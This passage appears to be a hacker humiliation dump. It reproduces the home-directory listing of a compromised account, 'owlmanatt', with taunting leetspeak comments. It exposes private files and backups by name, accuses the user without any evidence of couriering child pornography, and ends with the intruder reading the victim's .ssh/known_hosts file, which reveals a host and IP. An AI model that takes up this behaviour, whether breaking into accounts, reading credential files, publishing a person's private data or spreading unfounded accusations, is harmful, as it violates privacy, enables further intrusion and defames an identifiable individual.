Sep 29 23:03 /home/owlmanatt/english.php -rw-r--r-- 1 owlmanatt owlmanatt 9 Nov 28 23:01 /home/owlmanatt/festival -rw-r--r-- 1 owlmanatt owlmanatt 7 Oct 8 21:52 /home/owlmanatt/figlet -rw-r--r-- 1 owlmanatt owlmanatt 12886 Dec 31 2004 /home/owlmanatt/functions.inc.php~ -rw-r--r-- 1 owlmanatt owlmanatt 1816 Nov 20 08:24 /home/owlmanatt/genre.sql -rw-r--r-- 1 owlmanatt owlmanatt 4737 Feb 19 2005 /home/owlmanatt/grue.php -rwxr-xr-x 1 owlmanatt owlmanatt 7101 Nov 28 22:30 /home/owlmanatt/hello -rw-r--r-- 1 owlmanatt owlmanatt 445 Nov 28 22:30 /home/owlmanatt/hello.c -rw-r--r-- 1 owlmanatt owlmanatt 5445722 Jul 19 22:01 /home/owlmanatt/inkscape_0.41-5_i386.deb -rw-r--r-- 1 owlmanatt owlmanatt 169 Sep 4 12:29 /home/owlmanatt/laura_2005-09-04.txt -rw-r--r-- 1 owlmanatt owlmanatt 45788 Sep 27 20:15 /home/owlmanatt/leg-picture.com -rw------- 1 owlmanatt owlmanatt 3211 Nov 30 00:30 /home/owlmanatt/mbox -rw-r--r-- 1 owlmanatt owlmanatt 33 Oct 29 19:48 /home/owlmanatt/md5.php -rw-r--r-- 1 owlmanatt owlmanatt 20030 Nov 22 22:29 /home/owlmanatt/metar.php -rw-r--r-- 1 owlmanatt owlmanatt 20071 Nov 1 19:49 /home/owlmanatt/mindwar.doc -rw-r--r-- 1 owlmanatt owlmanatt 449 Oct 22 22:20 /home/owlmanatt/minicom.log -rwxr-xr-x 1 owlmanatt owlmanatt 11034 Jul 23 13:34 /home/owlmanatt/mirrorselect -rwxr-xr-x 1 owlmanatt owlmanatt 2496 Aug 16 18:10 /home/owlmanatt/mkthumb.sh -rw-r--r-- 1 owlmanatt owlmanatt 3146 Dec 29 2004 /home/owlmanatt/music. -rw-r--r-- 1 owlmanatt owlmanatt 5437 Nov 19 10:39 /home/owlmanatt/music.pls -rw-r--r-- 1 owlmanatt owlmanatt 1821 Aug 19 08:26 /home/owlmanatt/owl_client.php -rw-r--r-- 1 owlmanatt owlmanatt 2576 Aug 19 08:26 /home/owlmanatt/owl_client.php~ -rw-r--r-- 1 owlmanatt owlmanatt 1670 Aug 18 22:02 /home/owlmanatt/owl_inf.php -rw-r--r-- 1 owlmanatt owlmanatt 1684 Aug 18 22:02 /home/owlmanatt/owl_inf.php~ -rw-r--r-- 1 owlmanatt owlmanatt 170484 Nov 20 02:02 /home/owlmanatt/owl_library.sql -rw-r--r-- 1 owlmanatt owlmanatt 6859 Oct 30 00:22 /home/owlmanatt/owldb.sql.gz -rw-r--r-- 1 owlmanatt owlmanatt 441913 Aug 27 17:05 /home/owlmanatt/owlmanat_wrdp1.sql -rw-r--r-- 1 owlmanatt owlmanatt 8155 Nov 27 19:08 /home/owlmanatt/pet_greats.abw -rw-r--r-- 1 owlmanatt owlmanatt 6549 Nov 27 19:11 /home/owlmanatt/pet_greats.html -rw-r--r-- 1 owlmanatt owlmanatt 1158 Oct 16 17:10 /home/owlmanatt/phil_radio.aup -rw-r--r-- 1 owlmanatt owlmanatt 1158 Oct 16 16:59 /home/owlmanatt/phil_radio.aup~ -rw-r--r-- 1 owlmanatt owlmanatt 433196 Oct 16 17:10 /home/owlmanatt/phil_radio.wav -rw-r--r-- 1 owlmanatt owlmanatt 170593 Oct 2 22:17 /home/owlmanatt/pic1253.com -rw-r--r-- 1 owlmanatt owlmanatt 5825 Nov 20 01:43 /home/owlmanatt/publishers.sql -rw-r--r-- 1 owlmanatt owlmanatt 376832 Sep 25 2004 /home/owlmanatt/putty.exe -rw-r--r-- 1 owlmanatt owlmanatt 31036 Nov 13 22:23 /home/owlmanatt/reverend_credential.gif -rw-r--r-- 1 owlmanatt owlmanatt 7304 Nov 27 10:20 /home/owlmanatt/revo.txt -rwxr-xr-x 1 owlmanatt owlmanatt 10272 Aug 18 07:16 /home/owlmanatt/rlytest -rw-r--r-- 1 owlmanatt owlmanatt 191 Oct 26 22:14 /home/owlmanatt/scale.sh -rw-r--r-- 1 owlmanatt owlmanatt 10167 Sep 4 23:00 /home/owlmanatt/shit.txt -rw-r--r-- 1 owlmanatt owlmanatt 7906384 Oct 25 10:35 /home/owlmanatt/skype_1.2.0.18-1_i386.deb -rw-r--r-- 1 owlmanatt owlmanatt 23 Oct 23 20:22 /home/owlmanatt/soponica.txt -rw-r--r-- 1 owlmanatt owlmanatt 949226 Sep 4 12:37 /home/owlmanatt/spybotsd_includes.exe -rw-r--r-- 1 owlmanatt owlmanatt 65 Jul 28 23:25 /home/owlmanatt/tigress.contact -rw-r--r-- 1 owlmanatt owlmanatt 442 Nov 26 20:46 /home/owlmanatt/tmp.txt -rw-r--r-- 1 owlmanatt owlmanatt 51122 Oct 30 00:21 /home/owlmanatt/uber_wp.sql.gz -rw-r--r-- 1 root root 374 Jul 28 21:02 /home/owlmanatt/uninstalldirs -rwxr-xr-x 1 owlmanatt owlmanatt 416 Jun 27 01:44 /home/owlmanatt/webcamcheck.sh -rw-r--r-- 1 owlmanatt owlmanatt 893 Jun 19 16:22 /home/owlmanatt/windfis2.mid -rwxr-xr-x 1 owlmanatt owlmanatt 835 Jul 10 00:33 /home/owlmanatt/wp-config.php -~-~ S0ME D1R3KT0R13Z H4V3 B33N SN1PP3D DU3 T0 TH3M B31NG B0R1NG/IRR3L3V4NT -~-~ /home/owlmanatt/archives: total 543356 drwxr-xr-x 9 owlmanatt owlmanatt 4096 Oct 25 23:47 . drwx------ 138 owlmanatt owlmanatt 8192 Nov 30 21:32 .. -rw-r--r-- 1 owlmanatt owlmanatt 655146 Oct 25 23:47 2005-10-25_owlmanat-wrdp1.sql -rw-r--r-- 1 owlmanatt owlmanatt 8855552 Oct 3 2004 Comp04.zip drwxr-xr-x 3 owlmanatt owlmanatt 4096 Jun 27 19:11 Evanion Tmp -rw-r--r-- 1 owlmanatt owlmanatt 305652 Sep 21 2004 ExpenseManager_v02.zip -rw-r--r-- 1 owlmanatt owlmanatt 51843 Dec 3 2004 Handling GUI Access with X and VNC Servers.zip -rw-r--r-- 1 owlmanatt owlmanatt 16453 Jun 16 2004 Hosting.zip -rw-r--r-- 1 owlmanatt owlmanatt 768234 Jun 19 2004 Jordan.zip drwxr-xr-x 9 owlmanatt owlmanatt 4096 Jul 13 19:13 Neorus Tmp drwxr-xr-x 2 owlmanatt owlmanatt 4096 Aug 13 14:34 Omnir -rw-r--r-- 1 owlmanatt owlmanatt 16079193 Oct 3 2004 USBV258.zip -rw------- 1 owlmanatt owlmanatt 28661659 Jul 12 21:55 backup-7.13.2004_15-19-55_owlmanat.tar.gz -rw------- 1 owlmanatt owlmanatt 55882852 Jul 16 08:09 backup-7.16.2005_06-49-43_owlmanat.tar.gz -rw------- 1 owlmanatt owlmanatt 140971010 Aug 4 2004 backup-8.4.2004_12-14-35_jordank.tar.gz drwxr-xr-x 5 owlmanatt owlmanatt 4096 Sep 7 21:02 backup.cybit drwxr-xr-x 5 owlmanatt owlmanatt 4096 Jul 9 11:21 backup.prof drwxr-xr-- 7 owlmanatt owlmanatt 4096 Jul 9 16:01 betta -rw-r--r-- 1 owlmanatt owlmanatt 2831461 Dec 10 2004 bl3-32fd.zip -rw-r--r-- 1 owlmanatt owlmanatt 592046 Oct 17 2004 bootitng.zip -rw-r--r-- 1 owlmanatt owlmanatt 284405 Nov 18 2004 chizzy.tar.gz -rw-r--r-- 1 owlmanatt owlmanatt 2793257 Oct 16 2004 coldfire_03.tar.bz -rw-r--r-- 1 owlmanatt owlmanatt 656506 Jan 25 2005 dtrace.tar.gz -rw-r--r-- 1 owlmanatt owlmanatt 31924847 Jul 23 11:25 el_101.zip -rw-r--r-- 1 owlmanatt owlmanatt 275748 Nov 9 2004 enigmail-0.89.0-tb-linux.xpi -rw-r--r-- 1 owlmanatt owlmanatt 276799 Dec 7 2004 enigmail-0.89.5-tb-linux.xpi -rw-r--r-- 1 owlmanatt owlmanatt 100610 Dec 16 2004 gaim-otr_1.0.1-1_i386.deb -rw-r--r-- 1 owlmanatt owlmanatt 15036 Dec 20 2004 gaim-xmms-remote_1.7-2_i386.deb -rw-r--r-- 1 owlmanatt owlmanatt 197578 Jan 22 2005 hpna_2_0_linux_beta_drivers.tar.gz -rw-r--r-- 1 owlmanatt owlmanatt 218561829 Sep 20 2004 kato_backup.tar.gz -rw-r--r-- 1 owlmanatt owlmanatt 7854080 Apr 20 2004 logs.tar -rw-r--r-- 1 owlmanatt owlmanatt 2122727 Dec 10 2004 mulinux-14r0.tgz.gz -rw-r--r-- 1 owlmanatt owlmanatt 646893 May 22 2005 nasm-0.98.39.tar.gz <-- 0WL K4NT 3V3N K0D3 4SM -rw-r--r-- 1 owlmanatt owlmanatt 150068 Jun 25 13:02 ndiswrapper-1.2.tar.gz -rw-r--r-- 1 owlmanatt owlmanatt 130346 Jul 18 22:20 owlmanat_wrdp1.sql.gz -rw-r--r-- 1 owlmanatt owlmanatt 33454 Jul 18 22:20 owlmanat_wrdp2.sql.gz -rw-r--r-- 1 owlmanatt owlmanatt 57481 Jul 18 22:18 owlmanat_zombie.sql.gz -rw-r--r-- 1 owlmanatt owlmanatt 1255214 Feb 9 2005 perlbox-voice-0.08-noarch.deb -rw-r--r-- 1 owlmanatt owlmanatt 1453676 Oct 3 2004 phpsdl2.0linux.tar.gz -rw-r--r-- 1 owlmanatt owlmanatt 5823176 Apr 28 2005 skype_1.1.0.3-1_i386.deb -rw-r--r-- 1 owlmanatt owlmanatt 1840376 Jan 29 2005 squirrelmail_1.2.6-1.4_all.deb -rw-r--r-- 1 owlmanatt owlmanatt 10355480 Dec 7 2004 thunderbird-1.0.tar.gz -rw-r--r-- 1 owlmanatt owlmanatt 489789 Feb 11 2005 trident9850.zip -rw-r--r-- 1 owlmanatt owlmanatt 1733422 Jan 15 2005 widelands-data_build8-2_all.deb -rw-r--r-- 1 owlmanatt owlmanatt 516252 Jan 15 2005 widelands_build8-2_i386.deb -rw-r--r-- 1 owlmanatt owlmanatt 9624477 Feb 17 2005 www.AvaxHome.ru_-_LanguageProcessing.rar drwxr-xr-- 12 owlmanatt owlmanatt 4096 Sep 5 22:09 zetapets_vpl_thread <-- FUCK1NG L4M3!%@$&!@ -rw-r--r-- 1 owlmanatt owlmanatt 737321 Sep 5 22:10 zetapets_vpl_thread.tar.gz /home/owlmanatt/bash: total 28 drwxr-xr-x 6 owlmanatt owlmanatt 4096 Sep 12 2004 . drwx------ 138 owlmanatt owlmanatt 8192 Nov 30 21:32 .. drwxr-xr-x 3 owlmanatt owlmanatt 4096 Mar 4 2005 auto drwxr-xr-x 3 owlmanatt owlmanatt 4096 Sep 12 2004 exploit << 4 3xpl01T wh4T!@ drwxr-xr-x 2 owlmanatt owlmanatt 4096 Sep 12 2004 opgscript drwxr-xr-x 3 owlmanatt owlmanatt 4096 Sep 12 2004 owlmanatt@vtex.dyndns.org /home/owlmanatt/classified: total 208 drwxr-xr-x 10 owlmanatt owlmanatt 4096 Sep 4 19:37 . drwx------ 138 owlmanatt owlmanatt 8192 Nov 30 21:32 .. drwxr-xr-x 2 owlmanatt owlmanatt 4096 Oct 24 2004 .fae dr-xr-xr-x 2 owlmanatt owlmanatt 4096 Mar 13 2003 CF -r-xr-xr-x 1 owlmanatt owlmanatt 61078 Sep 14 2003 Tehqueenban.bmp drwxr-xr-x 4 owlmanatt owlmanatt 4096 Mar 12 2005 ThePlaceFinal -r-xr-xr-x 1 owlmanatt owlmanatt 4064 Aug 13 2003 apple.gif d--------- 2 owlmanatt owlmanatt 4096 Jul 24 13:37 art drwxr-xr-x 3 owlmanatt owlmanatt 4096 Mar 5 2005 eclog dr-xr-xr-x 3 owlmanatt owlmanatt 4096 Sep 17 2003 files -r-xr-xr-x 1 owlmanatt owlmanatt 4673 Jul 22 2003 fired.gif -r-xr-xr-x 1 owlmanatt owlmanatt 5364 Jul 23 2003 king.gif drwxr-xr-x 10 owlmanatt owlmanatt 4096 Sep 4 19:37 logs -r-xr-xr-x 1 owlmanatt owlmanatt 3193 Sep 6 2003 moron.gif -r-xr-xr-x 1 owlmanatt owlmanatt 21437 Aug 28 2003 rockwaterfeaturebig.gif drwxr-xr-x 2 owlmanatt owlmanatt 4096 Sep 12 2004 sql -r-xr-xr-x 1 owlmanatt owlmanatt 16887 Jul 25 2003 suck.jpg -r-xr-xr-x 1 owlmanatt owlmanatt 28384 Aug 13 2003 thefinger.jpg -r-xr-xr-x 1 owlmanatt owlmanatt 1925 Jul 11 2003 wtf.gif ^--- R34LLY L00KZ L1K3 S0M3 CL4SS1F13D SH1T T0 M3... /home/owlmanatt/images: total 12392 drwxr-xr-x 15 owlmanatt owlmanatt 4096 Oct 16 11:52 . drwx------ 138 owlmanatt owlmanatt 8192 Nov 30 21:32 .. -rw-r--r-- 1 owlmanatt owlmanatt 659 Nov 29 2004 .hack_SIGN Defragmented.htm drwxr-xr-x 4 owlmanatt owlmanatt 4096 Nov 29 2004 .hack_SIGN Defragmented_files drwxr-xr-x 2 owlmanatt owlmanatt 4096 Sep 12 2004 .xvpics -rw-r--r-- 1 owlmanatt owlmanatt 347320 Feb 22 2005 2.8.1_cd_cover.png -rw-r--r-- 1 owlmanatt owlmanatt 174278 Feb 22 2005 2.8.1_cd_label_1.png -rw-r--r-- 1 owlmanatt owlmanatt 0 Feb 22 2005 2.8.1_cd_label_2.png -rw-r--r-- 1 owlmanatt owlmanatt 1075651 Jan 2 2005 2004_Jan_02.png -rw-r--r-- 1 owlmanatt owlmanatt 17844 Feb 28 2005 30003_G.gif -rw-r--r-- 1 owlmanatt owlmanatt 104754 Mar 19 2005 Eerova_North.gif -rw-r--r-- 1 owlmanatt owlmanatt 64 Mar 11 2005 KNOPPIX_V3.6-2004-08-16-EN.iso.md5.htm -rw-r--r-- 1 owlmanatt owlmanatt 311953 Oct 7 2004 OwlMan10-7-04 -rw-r--r-- 1 owlmanatt owlmanatt 52482 Jun 13 16:29 Owl_moosh.jpg -r--r--r-- 1 owlmanatt owlmanatt 248525 Jan 9 2004 Screenshot.png -r--r--r-- 1 owlmanatt owlmanatt 195760 Dec 5 2003 Shellshot.png -rw-r--r-- 1 owlmanatt owlmanatt 117694 Jun 8 2004 aa.bmp -rw-r--r-- 1 owlmanatt owlmanatt 80234 Feb 3 2005 aaa3.bmp -rw-r--r-- 1 owlmanatt owlmanatt 496678 Jun 9 2004 art.bmp -rw-r--r-- 1 owlmanatt owlmanatt 103834 Mar 26 2005 avass.png drwxr-xr-- 2 owlmanatt owlmanatt 4096 May 4 2005 bible -rw-r--r-- 1 owlmanatt owlmanatt 154429 Jan 23 2005 bluething.png -r--r--r-- 1 owlmanatt owlmanatt 77121 Dec 6 2003 board.png -r--r--r-- 1 owlmanatt owlmanatt 1523 Nov 30 2003 bullet.jpg -rw-r--r-- 1 owlmanatt owlmanatt 7112 Feb 19 2005 bunker.png drwxr-xr-x 2 owlmanatt owlmanatt 4096 Oct 8 20:50 button -r--r--r-- 1 owlmanatt owlmanatt 5572 Dec 23 2003 cactus.png -rw-r--r-- 1 owlmanatt owlmanatt 98236 May 14 2005 cat.oci -r--r--r-- 1 owlmanatt owlmanatt 1084200 Dec 31 2003 catdog.jpg drwxr-xr-- 2 owlmanatt owlmanatt 4096 Sep 6 20:14 collage drwxr-xr-x 5 owlmanatt owlmanatt 4096 Jul 28 22:34 comic -r--r--r-- 1 owlmanatt owlmanatt 35627 Dec 2 2003 comic.png -rw-r--r-- 1 owlmanatt owlmanatt 10988 May 30 2004 creaturepic.gif -rw-r--r-- 1 owlmanatt owlmanatt 798 Jan 26 2005 dc.pl.htm -rw-r--r-- 1 owlmanatt owlmanatt 18378 Apr 3 2004 deamon.jpg drwxr-xr-x 5 owlmanatt owlmanatt 4096 Sep 4 19:56 desktop drwxr-xr-x 2 owlmanatt owlmanatt 4096 Jun 16 22:14 digicam drwxr-xr-x 2 owlmanatt owlmanatt 4096 Sep 12 2004 ec -rw-r--r-- 1 owlmanatt owlmanatt 20521 Feb 17 2004 excitement.jpg -rw-r--r-- 1 owlmanatt owlmanatt 10131 Nov 16 2004 firefox.jpg -rw-r--r-- 1 owlmanatt owlmanatt 896 Nov 5 2004 fox_blue_2.gif -r--r--r-- 1 owlmanatt owlmanatt 25534 Nov 23 2003 fuckers.jpg -r--r--r-- 1 owlmanatt owlmanatt 102454 Jan 3 2004 girl3.bmp -rw-r--r-- 1 owlmanatt owlmanatt 30688 Jan 30 2005 gnome.jpg drwxr-xr-x 3 owlmanatt owlmanatt 4096 Sep 12 2004 greece -r--r--r-- 1 owlmanatt owlmanatt 14015 Jan 21 2004 greece-map.gif -rw-r--r-- 1 owlmanatt owlmanatt 8717 Feb 14 2005 heartman.gif -rw-r--r-- 1 owlmanatt owlmanatt 15473 Feb 14 2005 heartman.png -r--r--r-- 1 owlmanatt owlmanatt 10787 Nov 29 2003 hitler.gif -r--r--r-- 1 owlmanatt owlmanatt 260569 Nov 16 2003 hot.png -rw-r--r-- 1 owlmanatt owlmanatt 1678 Nov 9 2004 ib.public.asc drwxr-xr-- 2 owlmanatt owlmanatt 4096 Jan 6 2005 icon -rw-r--r-- 1 owlmanatt owlmanatt 311952 Oct 7 2004 image004.ppm -rw-r--r-- 1 owlmanatt owlmanatt 120 Aug 26 2004 insomniac6.php.png -rw-r--r-- 1 owlmanatt owlmanatt 4318 Feb 27 2005 jackass.gif -rw-r--r-- 1 owlmanatt owlmanatt 2200 Jun 3 2004 kat.png -rw-r--r-- 1 owlmanatt owlmanatt 13005 Jan 9 2005 kenspa.gif -r--r--r-- 1 owlmanatt owlmanatt 59839 Nov 23 2003 knight.jpg -r--r--r-- 1 owlmanatt owlmanatt 213905 Jan 22 2004 knoppix-cover.png -r--r--r-- 1 owlmanatt owlmanatt 14325 Dec 7 2003 know.jpg -r--r--r-- 1 owlmanatt owlmanatt 20662 Dec 7 2003 know.png -rw-r--r-- 1 owlmanatt owlmanatt 48166 May 26 2004 laurel.jpg -r--r--r-- 1 owlmanatt owlmanatt 12462 Jan 9 2004 layout.png -r--r--r-- 1 owlmanatt owlmanatt 34056 Jan 9 2004 layout.xcf -rw-r--r-- 1 owlmanatt owlmanatt 62570 May 26 2004 lindsay.jpg -rw-r--r-- 1 owlmanatt owlmanatt 1427 Nov 11 2004 linux_powered.png -r--r--r-- 1 owlmanatt owlmanatt 4745 Dec 8 2003 linuxuser.gif -rw-r--r-- 1 owlmanatt owlmanatt 238734 Sep 25 2004 little2.bmp -rw-r--r-- 1 owlmanatt owlmanatt 13018 Oct 10 18:21 lj2.jpg -r--r--r-- 1 owlmanatt owlmanatt 6092 Dec 29 2003 llama.gif -r--r--r-- 1 owlmanatt owlmanatt 8399 Jan 21 2004 map.gif drwxr-xr-x 2 owlmanatt owlmanatt 4096 Oct 7 2004 me -rw-r--r-- 1 owlmanatt owlmanatt 2988 Jul 30 2004 me.gif -rw-r--r-- 1 owlmanatt owlmanatt 460 Nov 11 2004 mini_linux.gif -r--r--r-- 1 owlmanatt owlmanatt 3549 Dec 16 2003 mouse.jpg -rw-r--r-- 1 owlmanatt owlmanatt 20392 Jun 7 2004 nerdz.png -rw-r--r-- 1 owlmanatt owlmanatt 133164 Jun 18 21:36 network.png -rw-r--r-- 1 owlmanatt owlmanatt 31886 Jun 18 21:36 network.svg drwxr-xr-- 2 owlmanatt owlmanatt 4096 Oct 16 10:40 newhotness -rw-r--r-- 1 owlmanatt owlmanatt 4250 Mar 26 2005 ns.png -rw-r--r-- 1 owlmanatt owlmanatt 413552 Mar 25 2005 ns.svg -rw-r--r-- 1 owlmanatt owlmanatt 86472 Jun 11 2004 o1w3l_2.jpg -rw-r--r-- 1 owlmanatt owlmanatt 1980 Jun 11 2004 o1w3l_3.png -rw-r--r-- 1 owlmanatt owlmanatt 1397 Jun 12 17:35 oma_ava.jpg -rw-r--r-- 1 owlmanatt owlmanatt 133590 Feb 22 2005 omgsex0r.jpg -rw-r--r-- 1 owlmanatt owlmanatt 24632 Jun 7 2004 ow3l_1.png -r--r--r-- 1 owlmanatt owlmanatt 21759 Nov 28 2003 owl.png -rw-r--r-- 1 owlmanatt owlmanatt 112457 Jun 25 2004 owl1.png -rw-r--r-- 1 owlmanatt owlmanatt 876500 Jun 26 2004 owl2.png -rw-r--r-- 1 owlmanatt owlmanatt 23413 Jul 1 2004 owl5.png -rwx------ 1 owlmanatt owlmanatt 1380290 Oct 16 10:41 owl_2005-10-16_big.JPG -rw-r--r-- 1 owlmanatt owlmanatt 49251 Oct 16 11:52 owl_2005-10-16_small.JPG -r--r--r-- 1 owlmanatt owlmanatt 88161 Nov 28 2003 owlbanner.png -rw-r--r-- 1 owlmanatt owlmanatt 1346740 Feb 22 2005 penguin_gear.jpg -rw-r--r-- 1 owlmanatt owlmanatt 1347 Nov 5 2004 phppow.gif -rw-r--r-- 1 owlmanatt owlmanatt 14539 Oct 10 18:23 pic_aboutus_entry.jpg -r--r--r-- 1 owlmanatt owlmanatt 141371 Nov 26 2003 plug.png -rw-r--r-- 1 owlmanatt owlmanatt 5134 Jan 5 2005 poland_banner60.png -rw-r--r-- 1 owlmanatt owlmanatt 7663 Jan 5 2005 poland_banner90.png -rw-r--r-- 1 owlmanatt owlmanatt 310097 Oct 3 2004 rotsnake.gif -r--r--r-- 1 owlmanatt owlmanatt 40088 Dec 31 2003 show -rw-r--r-- 1 owlmanatt owlmanatt 316 Mar 21 2005 test.gif -rw-r--r-- 1 owlmanatt owlmanatt 526 Mar 21 2005 test.png -rw-r--r-- 1 owlmanatt owlmanatt 40280 Oct 10 18:02 totemT.gif -rw-r--r-- 1 owlmanatt owlmanatt 21576 Oct 3 2004 tux -rw-r--r-- 1 owlmanatt owlmanatt 15811 Oct 29 2004 tux.gif -rw-r--r-- 1 owlmanatt owlmanatt 47245 Oct 3 2004 tux.png -r--r--r-- 1 owlmanatt owlmanatt 89 Dec 8 2003 watch accounts.txt -r--r--r-- 1 owlmanatt owlmanatt 16741 Nov 29 2003 ww1.JPG -rw-r--r-- 1 owlmanatt owlmanatt 452535 Feb 15 2004 xine_snapshot-1.png ^ --- D0 N0T B3 F00L3D BY TH3 D3C3PT1V3 N4M3Z 0F TH3Z3 1M4G3Z. TH3Y 4R3 4CTU4LLY --- CH1LD P0RN. 1T 4PP34RZ 0WL 1Z A TRUZT3D K0UR13R 0F CH1LD P0RN0GR4PHY. /home/owlmanatt/novel: <--- L4M3 M0TH3R FUK1NG N0V3L!@!@# total 1712 drwxr-xr-x 6 owlmanatt owlmanatt 4096 Nov 25 14:59 . drwx------ 138 owlmanatt owlmanatt 8192 Nov 30 21:32 .. drwxr-xr-x 5 owlmanatt owlmanatt 4096 Feb 5 2005 04 -rw-r--r-- 1 owlmanatt owlmanatt 512087 Nov 25 14:58 mindwar.abw -rw-r--r-- 1 owlmanatt owlmanatt 501668 Nov 25 14:58 mindwar.doc -rw-r--r-- 1 owlmanatt owlmanatt 387549 Nov 25 14:58 mindwar.html -rw-r--r-- 1 owlmanatt owlmanatt 297565 Nov 25 14:59 mindwar.txt drwxr-xr-x 2 owlmanatt owlmanatt 4096 Oct 10 18:51 misc drwxr-xr-x 2 owlmanatt owlmanatt 4096 Oct 29 10:56 planning drwxr-xr-- 2 owlmanatt owlmanatt 4096 Oct 30 23:11 prewrites ^ --- R3M1NDZ M3 0F X1L3@H4CKM4N14 --- TH1Z 1Z N0T A G00D TH1NG. /home/owlmanatt/php: total 280 drwxr-xr-x 29 owlmanatt owlmanatt 4096 Jul 19 21:06 . drwx------ 138 owlmanatt owlmanatt 8192 Nov 30 21:32 .. -rw-r--r-- 1 owlmanatt owlmanatt 1983 Oct 25 2004 Eimi.php -rw-r--r-- 1 owlmanatt owlmanatt 1831 Oct 25 2004 Eimi.php~ drwxr-xr-x 2 owlmanatt owlmanatt 4096 Sep 12 2004 Lock drwxr-xr-x 2 owlmanatt owlmanatt 4096 Jan 2 2005 OrkExp drwxr-xr-x 2 owlmanatt owlmanatt 4096 Sep 12 2004 OwlFlux drwxr-xr-x 2 owlmanatt owlmanatt 4096 Sep 12 2004 OwlTracker drwxr-xr-x 2 owlmanatt owlmanatt 4096 Sep 12 2004 PetProject drwxr-xr-x 3 owlmanatt owlmanatt 4096 Sep 12 2004 blog drwxr-xr-x 3 owlmanatt owlmanatt 4096 Sep 12 2004 blogUnknown -rw-r--r-- 1 owlmanatt owlmanatt 1645 Aug 3 2004 bofh.php -rw-r--r-- 1 owlmanatt owlmanatt 1191 Oct 28 2004 calc.php -rw-r--r-- 1 owlmanatt owlmanatt 1182 Oct 28 2004 calc.php~ -rw-r--r-- 1 owlmanatt owlmanatt 1950 Apr 24 2004 cheater.php drwxr-xr-x 5 owlmanatt owlmanatt 4096 Sep 12 2004 cp2 drwxr-xr-x 3 owlmanatt owlmanatt 4096 Sep 12 2004 crown drwxr-xr-x 6 owlmanatt owlmanatt 4096 Sep 12 2004 crown_2005.03.09 drwxr-xr-x 3 owlmanatt owlmanatt 4096 Sep 12 2004 cybit -rw-r--r-- 1 owlmanatt owlmanatt 402 Aug 24 2004 export.php -rw-r--r-- 1 owlmanatt owlmanatt 10261 Aug 3 2004 fileeditor.php -rw-r--r-- 1 owlmanatt owlmanatt 458 Sep 22 2004 fortuned.php -rw-r--r-- 1 owlmanatt owlmanatt 12888 Dec 31 2004 functions.inc.php -rw-r--r-- 1 owlmanatt owlmanatt 3589 Apr 22 2004 globals.php -rw-r--r-- 1 owlmanatt owlmanatt 251 Feb 19 2005 grue.css -rw-r--r-- 1 owlmanatt owlmanatt 250 Feb 19 2005 grue.css~ -rw-r--r-- 1 owlmanatt owlmanatt 4737 Feb 19 2005 grue.php -rw-r--r-- 1 owlmanatt owlmanatt 4697 Feb 19 2005 grue.php~ drwxr-xr-x 4 owlmanatt owlmanatt 4096 Sep 12 2004 hackbsd <-- W4ZN'T TAL0N A P4RT 0F TH1Z L4M3 H4CK3R G4NG? -rw-r--r-- 1 owlmanatt owlmanatt 13463 Apr 23 2004 header.php -rw-r--r-- 1 owlmanatt owlmanatt 11709 Jun 16 2004 inc.php -rw-r--r-- 1 owlmanatt owlmanatt 206 Apr 22 2004 index.php drwxr-xr-x 2 owlmanatt owlmanatt 4096 Apr 24 2005 insom -rw-r--r-- 1 owlmanatt owlmanatt 6333 Jun 3 2004 inventory.php drwxr-xr-x 2 owlmanatt owlmanatt 4096 Sep 12 2004 irc drwxr-xr-x 9 owlmanatt owlmanatt 4096 Sep 12 2004 kpfinal -rw-r--r-- 1 owlmanatt owlmanatt 401 Mar 6 2005 login.html -rw-r--r-- 1 owlmanatt owlmanatt 44 Jun 23 22:09 md5.php drwxr-xr-x 2 owlmanatt owlmanatt 4096 Jan 23 2005 milli drwxr-xr-x 2 owlmanatt owlmanatt 4096 Sep 12 2004 misc -rw-r--r-- 1 owlmanatt owlmanatt 267 Oct 28 2004 moon.php -rw-r--r-- 1 owlmanatt owlmanatt 242 Nov 2 2004 nanowrimo.php -rw-r--r-- 1 owlmanatt owlmanatt 243 Nov 2 2004 nanowrimo.php~ drwxr-xr-x 2 owlmanatt owlmanatt 4096 Sep 12 2004 nerdz <-- nerdz: 0WLM4N4TT - UB3RUS3R - 1NF1N1TYB drwxr-xr-x 2 owlmanatt owlmanatt 4096 Sep 12 2004 nixsec <-- N1XS3C 1Z FUQQ1NG L4M3 4ND D34D. K1LL3D BY H0NO. G3T 0V3R 1T Y0U L0Z3RZ. drwxr-xr-x 7 owlmanatt owlmanatt 4096 Sep 12 2004 owl drwxr-xr-x 3 owlmanatt owlmanatt 4096 Sep 12 2004 owlforum drwxr-xr-x 2 owlmanatt owlmanatt 4096 Jan 26 2005 owlog2 drwxr-xr-x 5 owlmanatt owlmanatt 4096 Sep 12 2004 phreaksite -rw-r--r-- 1 owlmanatt owlmanatt 1644 Jun 27 19:12 safetybox.php -rw-r--r-- 1 owlmanatt owlmanatt 1699 Jan 6 2005 seele.php -rw-r--r-- 1 owlmanatt owlmanatt 1701 Jan 6 2005 seele.php~ drwxr-xr-x 4 owlmanatt owlmanatt 4096 Sep 12 2004 shaim drwxr-xr-x 3 owlmanatt owlmanatt 4096 Jan 9 2005 tiko drwxr-xr-x 2 owlmanatt owlmanatt 4096 Sep 12 2004 xeno drwxr-xr-x 2 owlmanatt owlmanatt 4096 Sep 12 2004 xml /home/owlmanatt/scripts: total 6924 drwxr-xr-x 3 owlmanatt owlmanatt 4096 Jul 19 21:03 . drwx------ 138 owlmanatt owlmanatt 8192 Nov 30 21:32 .. -rwxr-xr-x 1 owlmanatt owlmanatt 205 May 5 2005 auto -rw-r--r-- 1 owlmanatt owlmanatt 7022390 Jan 15 2005 et-linux-2.56-update.x86.run -rwxr-xr-x 1 root root 3394 Jan 29 2005 firewall.bsh -r-xr-xr-x 1 owlmanatt owlmanatt 536 Dec 9 2003 leif.pl -r--r--r-- 1 owlmanatt owlmanatt 586 Dec 30 2003 mdtrip drwxr-xr-x 2 owlmanatt owlmanatt 4096 Sep 12 2004 python -rw-r--r-- 1 owlmanatt owlmanatt 11444 Aug 3 2004 register.php -r--r--r-- 1 owlmanatt owlmanatt 285 Nov 23 2003 script -r--r--r-- 1 owlmanatt owlmanatt 449 Dec 5 2003 shaim.c <-- H4H4H4 WH4T 4 F41LUR3 0F A PR0J3KT BY N0N3 0TH3R TH4N N1XS3C/R3FLUX. owlmanatt@bell:/home/owlmanatt$ cd /home/owlmanatt/ owlmanatt@bell:/home/owlmanatt$ cat .ssh/known_hosts ecritters.biz,216.127.80.69 ssh-rsa 